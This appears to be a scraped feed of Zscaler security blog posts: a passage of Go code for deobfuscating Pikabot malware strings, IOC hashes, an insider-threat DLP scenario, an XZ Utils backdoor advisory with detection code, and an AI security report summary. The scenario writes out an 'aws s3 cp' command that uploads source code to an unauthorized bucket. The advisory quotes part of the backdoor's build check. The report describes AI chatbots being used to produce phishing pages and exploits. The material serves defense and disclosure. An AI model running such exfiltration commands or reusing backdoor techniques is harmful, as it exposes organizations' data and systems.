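// Base64 decode, AES-CBC decrypt. PKCS#7 unpadding is an assumption of this example.
func DecryptString(rc4Key, encArray, aesKey, iv []byte) (string, error) {
	stage1 := rc4Xor(rc4Key, encArray)
	if !isReadable(stage1) {
		return "", errors.New("RC4 output not readable: wrong key?")
	}
	ct, err := base64.StdEncoding.DecodeString(strings.ReplaceAll(string(stage1), "_", "="))
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("not Base64 of whole AES blocks: wrong key?")
	}
	block, err := aes.NewCipher(aesKey)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad PKCS#7 padding: wrong AES key/IV?")
	}
	return string(pt[:len(pt)-pad]), nil
}

// RecoverRC4Key tries every string collected from the function as the RC4 key,
// skips keys already consumed, and marks the first one whose output passes the chain.
func RecoverRC4Key(candidates []string, encArray []byte, used map[string]bool, aesKey, iv []byte) (key, plaintext string, ok bool) {
	for _, cand := range candidates {
		if cand == "" || used[cand] {
			continue
		}
		if pt, err := DecryptString([]byte(cand), encArray, aesKey, iv); err == nil {
			used[cand] = true
			return cand, pt, true
		}
	}
	return "", "", false
}

// EncryptFixture runs the chain in reverse; it exists only to build constructed test input.
func EncryptFixture(plain string, rc4Key, aesKey, iv []byte) []byte {
	pad := aes.BlockSize - len(plain)%aes.BlockSize
	padded := append([]byte(plain), bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, _ := aes.NewCipher(aesKey)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return rc4Xor(rc4Key, []byte(strings.ReplaceAll(base64.StdEncoding.EncodeToString(ct), "=", "_")))
}

func main() {
	enc := EncryptFixture("Kernel32.dll", []byte("string-key-1"), sampleAESKey, sampleAESIV)
	// Candidate strings as collected from one function; a junk string sits before the real key.
	candidates := []string{"junk-between-key-and-init", "string-key-1", "another-key"}
	used := map[string]bool{}
	key, pt, ok := RecoverRC4Key(candidates, enc, used, sampleAESKey, sampleAESIV)
	fmt.Printf("ok=%v key=%q plaintext=%q\n", ok, key, pt)
}
```

The readability check does most of the work: a wrong RC4 key turns the Base64 text into arbitrary bytes, which fails before any AES work is attempted, and a wrong AES key or IV is caught by the padding check. Because the consumed key is recorded in the shared map, a second string in the same function cannot be decrypted with a key that already produced a valid result, which is the false-positive limit the analyst note describes.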
Zscaler Coverage

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names:

- Win32.Trojan.PikaBot
- Win32.Downloader.PikaBot

Indicators Of Compromise (IOCs)

The following samples were used for testing the plugin.

SHA256 | DESCRIPTION
aebff5134e07a1586b911271a49702c8623b8ac8da2c135d4d3b0145a826f507 | Pikabot Sample
4c53383c1088c069573f918c0f99fe30fa2dc9e28e800d33c4d212a5e4d36839 | Pikabot Sample
15e4de42f49ea4041e4063b991ddfc6523184310f03e645c17710b370ee75347 | Pikabot Sample
e97fd71f076a7724e665873752c68d7a12b1b0c796bc7b9d9924ec3d49561272 | Pikabot Sample
a9f0c978cc851959773b90d90921527dbf48977b9354b8baf024d16fc72eae01 | Pikabot Sample
1c125a10c33d862e6179b6827131e1aac587d23f1b7be0dbcb32571d70e34de4 | Pikabot Sample
62f2adbc73cbdde282ae3749aa63c2bc9c5ded8888f23160801db2db851cde8f | Pikabot Sample
b178620d56a927672654ce2df9ec82522a2eeb81dd3cde7e1003123e794b7116 | Pikabot Sample
72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242 | Pikabot Sample

Acknowledgments

The following projects were the initial inspiration for developing our plugin. In addition, they assisted with the usage of IDA’s SDK:

- HexRaysDeob - by Rolf Rolles
- Goomba - by Hex-Rays

Mon, 08 Apr 2024 08:31:02 -0700 Nikolaos Pantazopoulos https://www.zscaler.com/blogs/security-research/automating-pikabot-s-string-deobfuscation

Join Zscaler for the Future of Digital Experience Monitoring Event https://www.zscaler.com/blogs/product-insights/join-zscaler-future-digital-experience-monitoring-event

It's time to register for the Future of Digital Experience Monitoring event. Here are a few reasons why you can’t miss it!
See what it takes to keep end users productive no matter the device, network, or application.

Zscaler Digital Experience (ZDX) is built on a foundation that goes beyond siloed monitoring solutions to provide full end-to-end visibility across devices (CPU, memory, Wi-Fi), networks (corporate or public internet), and applications (public or private).

Zscaler Digital Experience end-to-end data path

Find out what’s behind the high-confidence results delivered by advanced machine learning models.

Machine learning models that provide high-confidence results require an immense amount of data and training, which can't be built overnight. ZDX is powered by the industry’s largest inline security cloud, with 500 trillion daily signals feeding high-quality data to sophisticated AI models.

Zscaler Zero Trust Exchange

Learn about key ZDX AI capabilities already making an impact for many service desk and network operations teams.

Incident Dashboard includes machine learning models that detect and correlate issues across last-mile and intermediate ISPs, applications, Wi-Fi, Zscaler data centers, and endpoints. This enables Network Operations to quickly and efficiently find the root cause and focus on restoring reliable connectivity.

ZDX Incidents Dashboard

ZDX Self Service empowers users to fix problems that impact their digital experience when the causes are under their control. A lightweight AI engine runs in Zscaler Client Connector, notifies the user of issues such as poor Wi-Fi or high CPU utilization, and then offers ways to resolve the issue, reducing help tickets.

ZDX Self Service Notifications

Automated Root Cause Analysis reduces strain on service desk and operations teams by identifying root causes of issues (such as high CPU usage, Wi-Fi latency spikes on local routers, slow application response times, and more) that would typically require expert IT knowledge and multiple dashboards.
Users can get back to work more quickly and with fewer IT tickets, which tend to spike as users increasingly connect from anywhere using various devices, Wi-Fi access points, ISPs, zero trust environments, and applications.

ZDX Automated Root Cause Analysis

Join our upcoming webinar event

As organizations strive to optimize digital experiences and ensure secure access to applications and data, the future of digital experience monitoring lies in leveraging advanced AI capabilities. With consolidated digital experience monitoring integrated in a zero trust architecture, IT teams can resolve issues more quickly to enhance performance, reduce costs, and deliver exceptional user experiences. Join our upcoming webinar to discover how ZDX can transform your organization's digital experience monitoring strategy and drive superior business results.

Register now

Dates and times:
- Americas: Thursday, April 25 | 11 a.m. PT
- EMEA: Tuesday, April 30 | 10 a.m. BST
- APAC: Tuesday, April 30 | 10 a.m. IST

Featured speakers:
- Dhawal Sharma, SVP & GM, Product Management, Zscaler
- Javier Rodriguez, Sr. Director, Product Management, Zscaler

Wed, 03 Apr 2024 08:03:01 -0700 Rohit Goyal https://www.zscaler.com/blogs/product-insights/join-zscaler-future-digital-experience-monitoring-event

Betrayal in the Cloud: Unmasking Insider Threats and Halting Data Exfiltration from Public Cloud Workloads https://www.zscaler.com/blogs/product-insights/betrayal-cloud-unmasking-insider-threats-and-halting-data-exfiltration

Introduction

In today’s digital world, safeguarding sensitive data, such as source code, is crucial. Insider threats are a worthy adversary, posing significant risk, especially when trusted employees have access to valuable repositories. This article explores how a fictitious software development company could use Zscaler security solutions to stop insider attempts to upload source code.
By using Zscaler Workload Communications, the fictitious company detects and prevents unauthorized uploads, ensuring the security of its intellectual property.

Insider Threats in the Cloud and How to Stop Them

A fictitious software development company relies on its source code repository as the lifeblood of its operations. Trusted employees have access to this repository to facilitate collaboration and innovation. To mitigate the risk of insider threats, the fictitious company implements Zscaler security solutions. Let’s explore how our products thwart an insider’s attempt to upload source code to an unauthorized destination.

Attack Chain Use Case Steps

Trusted employee access: A trusted employee (insider) has access to the source code repository, enabling them to complete their job responsibilities. A simplified example of source code is shown below:

Insider threat incident: The trusted employee with legitimate access decides to misuse their privileges by attempting to upload source code files to an unauthorized destination (an AWS S3 bucket) with the intention of unauthorized sharing:

user:~$ aws s3 cp sourcecode.c s3://bucket/uploads/sourcecode.c

Figure 1: This diagram depicts how Zscaler blocks insider threats

Integration with Zscaler Workload Communications: The fictitious company’s source code repository is configured to route all outbound traffic through Zscaler Workload Communications, ensuring that data transmissions undergo rigorous inspection and security policies are enforced.

ZIA DLP engine implementation: ZIA leverages its powerful inline data loss protection (DLP) engine to analyze data traffic in real time. ZIA’s DLP policies are designed to identify and prevent unauthorized attempts to upload source code files to external storage spaces. An example of DLP configuration options is shown below.

Figure 2: An example of DLP configuration options.
Detection and prevention of file upload attempts: As the insider attempts to upload source code files to the unauthorized AWS S3 bucket, ZIA’s DLP engine detects the attempt as a violation of security policies. Leveraging advanced pattern recognition and behavior analysis, ZIA blocks the upload attempt in real time, preventing the exfiltration of company data. The figure below shows the source code file upload attempt failing in real time.

Figure 2: The source code file upload command receives an error when executed

The upload attempt, which was in violation of company policy, appears in descriptive log records, as shown below.

Figure 3: A log showing the failed source code file upload, along with important details like user, location, and destination

Alerting and response: The Zscaler security platform generates immediate alerts upon detecting the unauthorized upload attempt.

How Zscaler Can Help

Zscaler’s security products offer effective solutions against insider threats aimed at source code repositories:

Outbound Data Violation Trigger

By routing through Zscaler’s Cloud Connector, organizations can enforce security policies on all outbound data transmissions, including those from source code repositories. This integration ensures that every upload attempt undergoes security checks, regardless of the destination.

Data Breach Prevention

Zscaler Internet Access (ZIA) features a powerful data loss prevention (DLP) engine that analyzes data in real time. Leveraging advanced DLP policies, ZIA can detect patterns indicative of unauthorized source code uploads. This approach enables organizations to prevent data breaches before they occur.

Instant Alerts

The Zscaler platform provides real-time monitoring of all network activity, including access to source code repositories. Any suspicious behavior, such as attempts to upload source code to unauthorized destinations, triggers immediate alerts.
This allows security teams to respond promptly and prevent potential data exfiltration.

Conclusion

With cybersecurity threats on the rise, organizations must combat insider risks effectively. Zscaler solutions offer proactive measures against insider threats, as demonstrated by the hypothetical use case outlined above. By implementing robust DLP policies and real-time monitoring, organizations can protect their critical data from unauthorized access and maintain data integrity. The Zscaler platform equips organizations to tackle insider threats confidently, securing their digital assets effectively.

Tue, 02 Apr 2024 13:31:17 -0700 Sakthi Chandra https://www.zscaler.com/blogs/product-insights/betrayal-cloud-unmasking-insider-threats-and-halting-data-exfiltration

Exposing the Dark Side of Public Clouds - Combating Malicious Attacks on Workloads https://www.zscaler.com/blogs/product-insights/exposing-dark-side-public-clouds-combating-malicious-attacks-workloads

Introduction

This article compares the cybersecurity strategies of a company that does not use Zscaler solutions with one that has implemented Zscaler's offerings. By exploring two different scenarios, we will highlight the advantages of Zscaler zero trust for workload communications and its specific use of data loss prevention.

Threat Propagation Without Zscaler Integration

Lateral Movement Between Workloads

In the following scenario, you’ll see that without Zscaler’s integration, the organization is unable to detect or prevent threats effectively. This allows attackers to move laterally and exfiltrate data undetected, leading to significant security risks.

Workload 1 in Azure West sends an HTTP GET request to GitHub for a patch update: Workload 1, deployed in Azure West, initiates an outbound connection to GitHub to fetch a required patch update.
This HTTP GET request is sent to GitHub to download the patch:

An HTTP response containing malware from GitHub: Unbeknownst to the organization, the HTTP response received from GitHub contains embedded malware.

Attacker’s lateral movement to Workload 2: By exploiting the malware present in the HTTP response, an attacker gains access to Workload 1 and subsequently moves laterally to Workload 2 within the Azure West environment. From here, the attacker exploits vulnerabilities or misconfigurations in Workload 2 to achieve a network foothold and establish persistence in Workload 2 that furthers their malicious objectives.

Data exfiltration to a command-and-control (C2) server: With access to Workload 2, the attacker exfiltrates sensitive data from the organization’s environment to a remote C2 server.

Threat Containment with Zscaler Integration

In the following scenario, Zscaler’s integrated security platform provides comprehensive protection against various stages of the attack life cycle. Organizations can use Zscaler Internet Access (ZIA), coupled with Zscaler Data Loss Prevention (DLP) and Zscaler Workload Communications, to implement:

- Strict access controls
- Malware detection and prevention measures
- Workload segmentation

Enhanced outbound security measures to GitHub (internet): With Zscaler integrated into the organization’s infrastructure, outbound traffic from Workload 1 to GitHub is subjected to stringent access control policies. Only approved URIs are permitted, which ensures communications are limited to trusted destinations. Any attempt to access unauthorized URIs is blocked.

Malware detection and prevention: Zscaler’s security layers, including content inspection and advanced cloud sandbox features, intercept and inspect the HTTP response from GitHub in real time. Upon detecting malware, Zscaler halts transmission, preventing Workload 1 from being compromised.
Workload segmentation to prevent lateral movement: Zscaler enforces strict segmentation policies ensuring that Workload 1 and Workload 2, which are deployed across two different regions, are treated as private applications with no direct communication allowed between them. Such segmentation effectively isolates these workloads, preventing any lateral threat movement between them.

Egress traffic security from Workload 2 with advanced data protection: Egress traffic from Workload 2 is safeguarded using ZIA advanced protection capabilities. Zscaler ensures that sensitive data is not exfiltrated from the organization's environment. By enforcing DLP policies, Zscaler prevents unauthorized data transfers.

Conclusion

The deployment of Zscaler’s solutions significantly enhanced the organization’s ability to combat cyberthreats and safeguard public cloud workloads. Without Zscaler, companies face unmonitored outbound traffic, susceptibility to malware infiltration, and the risk of lateral movement and data exfiltration. With Zscaler zero trust for workloads, organizations enjoy comprehensive protection, including access control policies, malware detection and prevention, segmentation to prevent lateral movement, and advanced data protection measures. Implementing Zscaler solutions enables organizations to bolster their cybersecurity defenses, mitigate risks, and protect their intellectual property from evolving threats in an interconnected digital environment.

Tue, 02 Apr 2024 19:14:07 -0700 Sakthi Chandra https://www.zscaler.com/blogs/product-insights/exposing-dark-side-public-clouds-combating-malicious-attacks-workloads

CVE Advisory: CVE-2024-3094 - Security Compromise in XZ Utils https://www.zscaler.com/blogs/security-research/cve-advisory-cve-2024-3094-security-compromise-xz-utils

Introduction

On March 29th, a security incident surfaced involving XZ Utils, a widely utilized data compression package integrated into major Linux distributions.
Malicious code allowing unauthorized remote SSH access was discovered within versions 5.6.0 and 5.6.1 of XZ Utils. This exploit has been formally identified as CVE-2024-3094 and assigned a critical CVSS score of 10.

Background

XZ Utils fell victim to a sophisticated supply chain attack in which attackers targeted the liblzma library, a crucial dependency utilized by OpenSSH. This attack allowed for the injection of code into an OpenSSH server, resulting in the potential for remote code execution (RCE). The liblzma build process employs a series of intricate obfuscations to extract a prebuilt object file from a disguised test file within the source code. This object file is then utilized to modify specific functions within the liblzma library. Any software utilizing this modified version of the liblzma library is susceptible to data interception, modification, and breaches. The malicious code was promptly discovered and infected only the two most recent versions of the package, 5.6.0 and 5.6.1, both of which were released within the last month.

Affected Versions

The following table describes impacted distributions, along with a corresponding recommendation for each distribution.

Distribution | Affected Systems | Affected Packages | Recommendation
Alpine Linux | Edge (active development) | xz 5.6.1-r0; xz 5.6.1-r1 | Upgrade immediately to the latest version, 5.6.1-r2.
Arch Linux | N/A | 5.6.0-1, 5.6.1-1, and/or any release item that matches the following criteria: installation medium 2024.03.01; virtual machine images 20240301.218094 and 20240315.221711; container images created between and including 2024-02-24 and 2024-03-28 | Upgrade immediately to the latest version, 5.6.1-2.
Debian | Debian Unstable (aka “Sid”). This is a testing, unstable, and experimental version. | xz-utils 5.5.1alpha-0.1 (uploaded on 2024-02-01), up to and including 5.6.1-1. | Revert to 5.4.5 or upgrade to 5.6.1+really5.4.5-1. Note: No stable Debian versions are known to be impacted. Any compromised packages were part of Debian testing.
Kali | N/A | xz-utils 5.6.0-0.2 and/or any Kali installation updates made between March 26th and March 29th. | Apply the latest updates if you updated between March 26th and March 29th.
openSUSE | MicroOS; Tumbleweed | 5.6.0, and/or any updates that occurred between March 7th and March 28th. | Revert to 5.4.x. Note: For Tumbleweed users, you also have the option to upgrade to a new Tumbleweed snapshot (20240328 or later) containing the reverted version 5.6.1.revertto5.4.
Red Hat | Fedora 40*, 41; Fedora Rawhide. *Updated March 30, 2024: Fedora 40 beta does contain two affected versions of xz libraries, xz-libs-5.6.0-1.fc40.x86_64.rpm and xz-libs-5.6.0-2.fc40.x86_64.rpm. At this time, Fedora 40 does not appear to be affected by the actual malware exploit, but all Fedora 40 beta users are encouraged to revert to 5.4.x versions. | xz-5.6.0; xz-5.6.1 | Revert to 5.4.x. Note: Red Hat has advised users to immediately stop any instances of Fedora 41 or Fedora Rawhide until XZ packages are reverted to safe versions. Red Hat Enterprise Linux (RHEL) was not impacted by this vulnerability.

Table 1: A table listing impacted distributions, operating systems, and packages, along with recommendations to address the vulnerability.

Technical Details

The goal of the malicious backdoor implementing CVE-2024-3094 is to inject code into an OpenSSH server (SSHD) running on the victim's machine and allow remote attackers (who possess a certain private key) to send an arbitrary payload via SSH, which is executed before the authentication step and runs commands on the victim’s machine. This supply chain attack uses multiple stages to decrypt obfuscated payloads and modify the build process of the XZ Utils tools. The obfuscated/encrypted stages and the later binary backdoor are hidden in these two test files:

- tests/files/bad-3-corrupt_lzma2.xz
- tests/files/good-large_compressed.lzma

The figure below depicts the attack sequence an attacker could exploit.
Figure 1: A diagram of the attack flow.

The build process uses the following command to ensure that the victim’s system is running on Linux and has an x86_64 architecture:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); then

In addition, the build process checks whether the package being built is Debian- or Red Hat-based (.rpm). It also inspects certain environment variables such as TERM and LANG. The TERM variable is set after SSH client and server authentication. The malicious payload verifies that the TERM variable is not set and that the LANG variable is set, and ensures that the running binary is /usr/sbin/sshd, as the backdoor is not relevant to other binaries.

After deciphering and decompressing the malicious payload over multiple stages, the payload is injected into liblzma. The payload modifies the behavior of the RSA_public_decrypt function, which is used in the verification of signatures. The payload extracts the RSA public modulus N from the attacker’s request and decrypts it using the ChaCha20 symmetric stream cipher. The decrypted data is validated using the Ed448 elliptic curve signature algorithm. Then, the decrypted payload is executed on the user’s SSH server. The backdoor contains only the public key, which ensures that only the attackers can generate valid payloads for the backdoor. The signature is bound to the host’s public key, meaning that a valid signature for one host cannot be reused for a different host.

Recommendations

In response to this threat, the Cybersecurity and Infrastructure Security Agency (CISA) has issued directives for affected individuals and organizations. XZ Utils developers and users are strongly advised to downgrade to a trusted, unaffected version of XZ Utils predating 5.6.0, such as 5.4.6 stable, or upgrade to a newer fixed version, if available.
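Checking whether a host is on an affected or a reverted build is less uniform than it looks, because several of the safe packages in Table 1 still carry a 5.6.1-looking version string (Debian's 5.6.1+really5.4.5-1, openSUSE's 5.6.1.revertto5.4, Alpine's 5.6.1-r2), so a bare pattern such as 5\.6\.[01] matched against package-manager output flags them as affected. The Go program below is an added example written for this advisory, not Zscaler's or any distribution's tooling: it parses xz --version output, trims distribution package strings to the upstream version, and classifies them using only the versions Table 1 names. The xz --version sample and the package strings are constructed, and the distribution keys of fixedPerTable are this example's own labels.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
	"unicode"
)

// Constructed sample of `xz --version` output; not captured from a real host.
const sampleXZVersionOutput = "xz (XZ Utils) 5.6.1\nliblzma 5.6.1\n"

// naivePattern is the advisory's one-line grep expression applied to any string.
var naivePattern = regexp.MustCompile(`5\.6\.[01]`)

// NaiveFlag reports whether the bare grep pattern would match a version string.
func NaiveFlag(s string) bool { return naivePattern.MatchString(s) }

// fixedPerTable lists, per distribution, the package version Table 1 names as
// the safe replacement. Debian's and openSUSE's still start with "5.6.1".
var fixedPerTable = map[string][]string{
	"alpine":   {"5.6.1-r2"},
	"arch":     {"5.6.1-2"},
	"debian":   {"5.6.1+really5.4.5-1"},
	"opensuse": {"5.6.1.revertto5.4"},
}

// ParseXZVersion pulls the xz and liblzma versions out of `xz --version` output.
func ParseXZVersion(out string) (xz, liblzma string) {
	for _, line := range strings.Split(out, "\n") {
		f := strings.Fields(line)
		if len(f) < 2 {
			continue
		}
		switch f[0] {
		case "xz":
			xz = f[len(f)-1]
		case "liblzma":
			liblzma = f[len(f)-1]
		}
	}
	return xz, liblzma
}

// UpstreamVersion trims a package version such as "xz-libs-5.6.0-1.fc40.x86_64.rpm"
// or "xz-utils 5.6.1-1" down to the upstream XZ Utils version ("5.6.0", "5.6.1").
func UpstreamVersion(pkg string) string {
	start := strings.IndexFunc(pkg, unicode.IsDigit)
	if start < 0 {
		return ""
	}
	rest := pkg[start:]
	if end := strings.IndexAny(rest, "-+ "); end >= 0 {
		rest = rest[:end]
	}
	return rest
}

// PackageStatus classifies a distribution package version against Table 1:
// "fixed" for the distribution's named safe build, "affected" for upstream
// 5.6.0/5.6.1 (and Debian's 5.5.1alpha upload), "clean" otherwise.
func PackageStatus(distro, pkg string) string {
	distro = strings.ToLower(distro)
	for _, fixed := range fixedPerTable[distro] {
		if strings.HasSuffix(pkg, fixed) {
			return "fixed"
		}
	}
	up := UpstreamVersion(pkg)
	if up == "5.6.0" || up == "5.6.1" || (distro == "debian" && strings.HasPrefix(up, "5.5.1alpha")) {
		return "affected"
	}
	return "clean"
}

func main() {
	xz, lib := ParseXZVersion(sampleXZVersionOutput)
	fmt.Printf("xz %s, liblzma %s -> %s\n", xz, lib, PackageStatus("", xz))
	// Constructed package strings modelled on the rows of Table 1.
	for _, p := range []struct{ distro, pkg string }{
		{"alpine", "xz-5.6.1-r1"}, {"alpine", "xz-5.6.1-r2"},
		{"debian", "xz-utils 5.6.1+really5.4.5-1"}, {"opensuse", "5.6.1.revertto5.4"},
		{"fedora", "xz-libs-5.6.0-1.fc40.x86_64.rpm"},
	} {
		fmt.Printf("%-9s %-36s grep=%-5v status=%s\n", p.distro, p.pkg, NaiveFlag(p.pkg), PackageStatus(p.distro, p.pkg))
	}
}
```

The pattern check and the table check deliberately disagree on the reverted packages: grep=true with status=fixed is the expected result for Debian's and openSUSE's rebuilt packages, and an inventory script that only keeps the bare pattern would keep paging on hosts that are already on the safe build. For distributions not in Table 1 (Fedora's "Revert to 5.4.x" gives no single package version), only the upstream-version rule applies.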
Additionally, thorough audits of system logs and network traffic are encouraged to identify any signs of suspicious activity. Any findings should be promptly reported to CISA for further investigation.

How To Detect CVE-2024-3094

To check whether your version of XZ Utils is impacted (5.6.0 or 5.6.1), run the following command:

  $(which xz) --version | grep '5\.6\.[01]'

Zscaler Coverage

The Zscaler ThreatLabz team has deployed protection:

- Zscaler Advanced Threat Protection: Linux.Exploit.CVE-2024-3094

Zscaler continues to monitor, through our telemetry data, for activity potentially exploiting this vulnerability.

References

- https://jfrog.com/blog/xz-backdoor-attack-cve-2024-3094-all-you-need-to-know/#who-is-affected-by-cve-2024-3094
- https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users
- https://vulcan.io/blog/alert-cve-2024-3094
- https://news.opensuse.org/2024/03/29/xz-backdoor/
- https://pkgs.alpinelinux.org/package/edge/main/x86/xz
- https://lists.debian.org/debian-security-announce/2024/msg00057.html

Mon, 01 Apr 2024 17:23:11 -0700 Varun Sandila https://www.zscaler.com/blogs/security-research/cve-advisory-cve-2024-3094-security-compromise-xz-utils

New AI Insights: Explore Key AI Trends and Risks in the ThreatLabz 2024 AI Security Report
https://www.zscaler.com/blogs/security-research/new-ai-insights-explore-key-ai-trends-and-risks-threatlabz-2024-ai-security

Today, Zscaler ThreatLabz released its inaugural ThreatLabz 2024 AI Security Report. This report comes at a key inflection point: as AI tools and large language models (LLMs) like ChatGPT weave their way into the fabric of enterprise life, questions around how to securely enable these AI tools and protect enterprise data remain unanswered. Complicating matters, AI is also driving a new generation of cyber threats, enabling adversaries to launch attacks at greater speed, sophistication, and scale.
As a result, enterprises must take the right steps to both securely enable AI productivity tools within the business and leverage AI to defend against a new landscape of AI-driven threats. The Zscaler ThreatLabz 2024 AI Security Report draws on more than 18 billion transactions in the Zscaler Zero Trust Exchange™ from April 2023 to January 2024. The report uncovers key trends, risks, and best practices in the ways that enterprises are adopting — and blocking — AI applications across industry verticals and around the world. Meanwhile, ThreatLabz also offers insight into the evolving AI threat landscape and real-world AI threat scenarios, before providing key security best practices for defending against them (including with AI).

Download the Zscaler ThreatLabz 2024 AI Security Report to uncover data-driven AI insights and enterprise best practices for securing AI.

Key ThreatLabz AI Findings

- Explosive AI growth: Enterprise AI/ML transactions surged by 595% between April 2023 and January 2024.
- Concurrent rise in blocked AI traffic: Even as enterprise AI usage accelerates, enterprises block 18.5% of all AI transactions, a 577% increase signaling rising security concerns.
- Primary industries driving AI traffic: Manufacturing accounts for 21% of all AI transactions in the Zscaler security cloud, followed by Finance and Insurance (20%) and Services (17%).
- Clear AI leaders: The most popular AI/ML applications for enterprises by transaction volume are ChatGPT, Drift, OpenAI, Writer, and LivePerson.
- Global AI adoption: The top five countries generating the most enterprise AI transactions are the US, India, the UK, Australia, and Japan.
- A new AI threat landscape: AI is empowering threat actors in unprecedented ways, including for AI-driven phishing campaigns, deepfakes and social engineering attacks, polymorphic ransomware, enterprise attack surface discovery, exploit generation, and more.
Enterprise decision point: when to allow AI apps, when to block them, and how to mitigate ‘shadow AI’ risk

One key theme in the report is that, to reap the full transformative potential of AI, enterprises must work to securely enable AI — that is, to minimize the risks associated with integrating and developing AI tools, while devising strategies to prevent or curtail an explosion of unapproved AI tools in the enterprise, a trend dubbed ‘shadow AI’. In general, enterprises can think about these risks as falling into three broad categories:

- Protecting sensitive data: Generative AI tools can inadvertently leak sensitive and confidential information, making data protection measures crucial. In fact, sensitive data disclosure is number six on the Open Worldwide Application Security Project (OWASP) Top Ten for AI Applications. Apart from adversarial threats like prompt injection attacks or malware, the biggest risks can stem from well-meaning users who inadvertently expose sensitive or proprietary data to large language models (LLMs). There are numerous ways that enterprise users may unknowingly do this, for example an engineer asking a gen AI tool to optimize or refactor proprietary code, or a sales team member asking an AI to use historical sales figures to forecast future pipeline. Enterprises should implement robust AI policy guidelines and technology-based data loss prevention (DLP) measures to prevent accidental data leaks and breaches. Meanwhile, they should also gain deep visibility into AI app usage to prevent or mitigate shadow AI, with granular access controls that ensure users only leverage approved AI applications.

- Data privacy and security risks of AI apps: Not all AI applications have the same level of data privacy and security. Terms, conditions, and policies can vary greatly, and enterprises should consider whether their data, for example, will be used to train language models, mined for advertising, or sold to third parties.
Enterprises must assess and assign security risk scores to the AI applications they use, considering factors like data protection and the security practices of the companies behind them.

- Data quality and poisoning concerns: The quality and scale of data used to train AI applications directly impact the reliability of AI outputs. Enterprises should carefully evaluate data quality when selecting an AI solution and establish a strong security foundation to mitigate risks like data poisoning.

The new era of AI-driven threats

The risks of AI are bi-directional: from outside enterprise walls, businesses face a continuous wave of threats that now includes AI-driven attacks. The reality is that virtually every type of existing threat can be aided by AI, which translates to attacks being launched at unprecedented speed, sophistication, and scale. Meanwhile, the future possibilities are limitless — meaning that enterprises face an unknown set of unknowns when it comes to AI-driven cyber attacks. Still, clear attack patterns are emerging. In the 2024 AI Security Report, ThreatLabz provides insights into numerous evolving threat types, including:

- AI impersonation: AI deepfakes, sophisticated social engineering attacks, misinformation, and more.
- AI-generated phishing campaigns: end-to-end campaign generation, along with a ThreatLabz case study in creating a phishing login page using ChatGPT — in seven simple prompts.
- AI-driven malware and ransomware: how threat actors are leveraging AI automation across numerous stages of the attack chain.
- Using ChatGPT to generate vulnerability exploits: ThreatLabz shows how easy it is to create exploit PoCs, in this case for Log4j (CVE-2021-44228) and Apache HTTP Server path traversal (CVE-2021-41773).
- Dark chatbots: diving into the proliferation of dark web GPT models like FraudGPT and WormGPT that lack security guardrails.
- And much more…

Best practices for secure AI transformation and layered AI + zero trust cyber defense

The transformative power of AI is undeniable. To reap its enormous potential, enterprises must overcome the bi-directional set of risks that AI creates, namely:

- Securely enabling AI: protecting enterprise data while ushering in transformative productivity changes.
- Using AI to fight AI: using the power of enterprise security data to drive AI threat prevention across the attack chain, deliver real-time security insights, and fast-track zero trust.

To that end, the Zscaler ThreatLabz 2024 AI Security Report offers key guidance, including:

- How to securely enable ChatGPT: a best practice case study for securing generative AI tools, in five steps.
- AI best practices and AI policy guidelines: AI frameworks and best practices that any enterprise can adopt.
- How Zscaler uses AI to stop cyber threats: leveraging AI detections across each stage of the attack chain, with holistic visibility into enterprise cyber risk.
- How Zscaler enables secure AI transformation: the key capabilities that enterprises require to securely embrace genAI and ML tools, including:
  - Full visibility into AI tool usage
  - Granular access policy creation for AI
  - Granular data security for AI applications
  - Powerful controls with browser isolation

Of course, AI begins and ends with the power of data. To dive deeper, download your copy of the Zscaler ThreatLabz 2024 AI Security Report or register for our live session with Zscaler CSO Deepen Desai, Navigating the AI Security Horizon: Insights from the Zscaler ThreatLabz 2024 AI Security Report. Meanwhile, if you want more information on how Zscaler is harnessing the power of AI, register for our innovation launch, The First AI Data Security Platform.
Wed, 27 Mar 2024 11:54:38 -0700 Will Seaton https://www.zscaler.com/blogs/security-research/new-ai-insights-explore-key-ai-trends-and-risks-threatlabz-2024-ai-security

The Best Medicine for Healthcare Data Is Integrated DLP
https://www.zscaler.com/blogs/product-insights/best-medicine-healthcare-data-integrated-dlp

You could argue that the challenges of securing medical data are more imposing than those of securing any other form of data. Electronic health records (EHR) are often transferred and shared between providers on a regular basis, and these records contain personal, in-depth patient data. These transfers put protected health information (PHI) at high risk as it moves from location to location. Additionally, the stringent regulations and compliance requirements for PHI force providers to learn how to construct the best data protection strategy for their needs—although this has been a necessary evil for some time now.

To this end, our friends within the Health Information Management Working Group at CSA have put together a great discussion on the task of securing patient data and the development of best practices. For providers looking for guidance from an expert that has made the data protection journey, this content can be extremely valuable:

- Cloud Security Alliance Working Group: Health Information Management
- Research Publication: Data Loss Prevention in Healthcare

One of the main topics of this publication is the architecture from which you should deliver data loss prevention (DLP) and data protection. While it’s important to understand best practices on how to implement data protection in the healthcare industry, it’s also valuable to know what the right architecture for a unified data protection platform should look like. With that, let's read a few paragraphs on how Gartner defines Security Service Edge (SSE) and how it can help providers deliver better protection for data in motion and at rest.
Securing Data in Motion

In the medical and health industries, protecting sensitive data during transit is crucial. With the increasing reliance on digital platforms and the internet, organizations often face the challenge of safeguarding data over untrusted networks. The core building block for securing this sensitive data is DLP. Inline DLP combined with SSL inspection enables sensitive data in transit to be identified and classified. This ensures that data leaks to the internet or via email are prevented, maintaining the confidentiality of patient information.

To this end, inline visibility into cloud apps such as electronic health record systems is also essential. By leveraging inline CASB technology, organizations can detect shadow IT and block risky apps, ensuring data security without hindering the use of critical cloud applications.

